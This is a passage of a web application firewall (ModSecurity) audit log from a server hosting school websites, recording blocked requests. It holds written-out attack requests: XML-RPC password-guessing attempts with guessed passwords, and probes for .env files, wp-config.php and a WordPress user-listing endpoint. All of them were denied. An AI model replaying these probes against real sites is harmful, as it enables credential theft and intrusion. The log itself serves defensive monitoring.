wp.getUsersBlogs timkreatif jessica --77b50f7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77b50f7d-E-- --77b50f7d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (126+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288834281251 5086 (- - -) Stopwatch2: 1749288834281251 5086; combined=3867, p1=459, p2=3228, p3=0, p4=0, p5=107, sr=77, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77b50f7d-Z-- --65cd5017-A-- [07/Jun/2025:16:33:58 +0700] aEQHhmCOO9DrcKL2J_4dQgAAANE 103.236.140.4 48630 103.236.140.4 8181 --65cd5017-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --65cd5017-C-- wp.getUsersBlogs timkreatif 1234%^&* --65cd5017-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65cd5017-E-- --65cd5017-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288838607251 4712 (- - -) Stopwatch2: 1749288838607251 4712; combined=3124, p1=374, p2=2595, p3=0, p4=0, p5=91, sr=82, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65cd5017-Z-- --3f60ff71-A-- [07/Jun/2025:16:34:54 +0700] aEQHvpANhDjQAvBdMyH7yQAAAJY 103.236.140.4 50734 103.236.140.4 8181 --3f60ff71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3f60ff71-C-- wp.getUsersBlogs timkreatif bubbles --3f60ff71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f60ff71-E-- --3f60ff71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (120+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288894380902 5777 (- - -) Stopwatch2: 1749288894380902 5777; combined=4029, p1=496, p2=3315, p3=0, p4=0, p5=127, sr=86, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f60ff71-Z-- --53e90277-A-- [07/Jun/2025:16:37:46 +0700] aEQIahK9gc79coX6mHSsqwAAAEY 103.236.140.4 56924 103.236.140.4 8181 --53e90277-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ONEPLUS A5010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --53e90277-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53e90277-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749289066448041 829 (- - -) Stopwatch2: 1749289066448041 829; combined=351, p1=305, p2=0, p3=0, p4=0, p5=46, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53e90277-Z-- --275edb72-A-- [07/Jun/2025:17:02:38 +0700] aEQOPpANhDjQAvBdMyEChQAAAJE 103.236.140.4 56498 103.236.140.4 8181 --275edb72-B-- GET /.docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept-Charset: utf-8 --275edb72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --275edb72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749290558816236 827 (- - -) Stopwatch2: 1749290558816236 827; combined=314, p1=276, p2=0, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --275edb72-Z-- --8e8b9524-A-- [07/Jun/2025:17:09:07 +0700] aEQPwxK9gc79coX6mHS0ugAAAEY 103.236.140.4 58670 103.236.140.4 8181 --8e8b9524-B-- GET /.env HTTP/1.0 Host: ns1.dwitekno.co.id X-Real-IP: 194.0.234.149 X-Forwarded-Host: ns1.dwitekno.co.id X-Forwarded-Server: ns1.dwitekno.co.id X-Forwarded-For: 194.0.234.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 zgrab/0.x Accept: */* --8e8b9524-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e8b9524-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749290947510316 831 (- - -) Stopwatch2: 1749290947510316 831; combined=321, p1=281, p2=0, p3=0, p4=0, p5=39, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e8b9524-Z-- --b21aeb26-A-- [07/Jun/2025:17:30:25 +0700] aEQUwRK9gc79coX6mHS1UAAAAFg 103.236.140.4 59242 103.236.140.4 8181 --b21aeb26-B-- GET /public/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36 Accept-Charset: utf-8 --b21aeb26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b21aeb26-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749292225310907 787 (- - -) Stopwatch2: 1749292225310907 787; combined=309, p1=270, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b21aeb26-Z-- --8dd9032e-A-- [07/Jun/2025:17:33:31 +0700] aEQVe_ClubEPOra_8Uk1ZQAAABY 103.236.140.4 59258 103.236.140.4 8181 --8dd9032e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.80 (Android; Opera Mini/7.6.40234/151.113; U; en) Presto/2.12.423 Version/12.16 Accept-Charset: utf-8 --8dd9032e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8dd9032e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749292411155864 839 (- - -) Stopwatch2: 1749292411155864 839; combined=314, p1=273, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8dd9032e-Z-- --f4ec622a-A-- [07/Jun/2025:17:33:37 +0700] aEQVgfClubEPOra_8Uk1ZwAAABE 103.236.140.4 59264 103.236.140.4 8181 --f4ec622a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3676.400 QQBrowser/10.4.3469.400 Accept-Charset: utf-8 --f4ec622a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4ec622a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749292417424196 818 (- - -) Stopwatch2: 1749292417424196 818; combined=313, p1=274, p2=0, p3=0, p4=0, p5=38, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4ec622a-Z-- --567a4059-A-- [07/Jun/2025:18:20:55 +0700] aEQgl2COO9DrcKL2J_4n2QAAAM8 103.236.140.4 59432 103.236.140.4 8181 --567a4059-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.148.25.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.148.25.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --567a4059-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --567a4059-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749295255573911 3637 (- - -) Stopwatch2: 1749295255573911 3637; combined=1554, p1=514, p2=999, p3=0, p4=0, p5=41, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --567a4059-Z-- --f5659759-A-- [07/Jun/2025:18:58:19 +0700] aEQpWxK9gc79coX6mHS1vAAAAFA 103.236.140.4 59806 103.236.140.4 8181 --f5659759-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 159.65.15.81 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 159.65.15.81 Accept-Encoding: gzip X-Varnish: 174949853 --f5659759-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f5659759-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749297499938253 862 (- - -) Stopwatch2: 1749297499938253 862; combined=335, p1=296, p2=0, p3=0, p4=0, p5=39, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5659759-Z-- --f7f72c24-A-- [07/Jun/2025:19:13:31 +0700] aEQs6xK9gc79coX6mHS2EQAAAEs 103.236.140.4 60362 103.236.140.4 8181 --f7f72c24-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.236.163.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.236.163.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f7f72c24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7f72c24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749298411113545 2831 (- - -) Stopwatch2: 1749298411113545 2831; combined=1274, p1=427, p2=817, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7f72c24-Z-- --9573e25a-A-- [07/Jun/2025:20:09:26 +0700] aEQ6BmCOO9DrcKL2J_4oPAAAAMs 103.236.140.4 32906 103.236.140.4 8181 --9573e25a-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9573e25a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9573e25a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301766040461 851 (- - -) Stopwatch2: 1749301766040461 851; combined=302, p1=262, p2=0, p3=0, p4=0, p5=39, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9573e25a-Z-- --9a22060d-A-- [07/Jun/2025:20:09:26 +0700] aEQ6BvClubEPOra_8Uk14QAAABg 103.236.140.4 32908 103.236.140.4 8181 --9a22060d-B-- GET /.env.bak HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9a22060d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a22060d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301766223037 709 (- - -) Stopwatch2: 1749301766223037 709; combined=282, p1=246, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a22060d-Z-- --9db00e74-A-- [07/Jun/2025:20:09:26 +0700] aEQ6BhK9gc79coX6mHS2sQAAAEQ 103.236.140.4 32910 103.236.140.4 8181 --9db00e74-B-- GET /.env.example HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9db00e74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9db00e74-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301766406240 675 (- - -) Stopwatch2: 1749301766406240 675; combined=254, p1=221, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9db00e74-Z-- --2e477f2e-A-- [07/Jun/2025:20:09:26 +0700] aEQ6BpANhDjQAvBdMyEDTQAAAIA 103.236.140.4 32912 103.236.140.4 8181 --2e477f2e-B-- GET /.env.local HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2e477f2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e477f2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301766588717 20445 (- - -) Stopwatch2: 1749301766588717 20445; combined=39720, p1=219, p2=0, p3=0, p4=0, p5=19768, sr=64, sw=0, l=0, gc=19733 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e477f2e-Z-- --a2cdb908-A-- [07/Jun/2025:20:09:26 +0700] aEQ6BvClubEPOra_8Uk14gAAAAY 103.236.140.4 32914 103.236.140.4 8181 --a2cdb908-B-- GET /.env.old HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a2cdb908-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2cdb908-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301766771170 841 (- - -) Stopwatch2: 1749301766771170 841; combined=304, p1=262, p2=0, p3=0, p4=0, p5=41, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2cdb908-Z-- --4c5e5364-A-- [07/Jun/2025:20:09:26 +0700] aEQ6BmCOO9DrcKL2J_4oPQAAANg 103.236.140.4 32916 103.236.140.4 8181 --4c5e5364-B-- GET /.env.production HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --4c5e5364-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c5e5364-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301766953880 913 (- - -) Stopwatch2: 1749301766953880 913; combined=342, p1=296, p2=0, p3=0, p4=0, p5=46, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c5e5364-Z-- --a68e4f1d-A-- [07/Jun/2025:20:09:40 +0700] aEQ6FPClubEPOra_8Uk15AAAAAE 103.236.140.4 32922 103.236.140.4 8181 --a68e4f1d-B-- GET /app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a68e4f1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a68e4f1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file 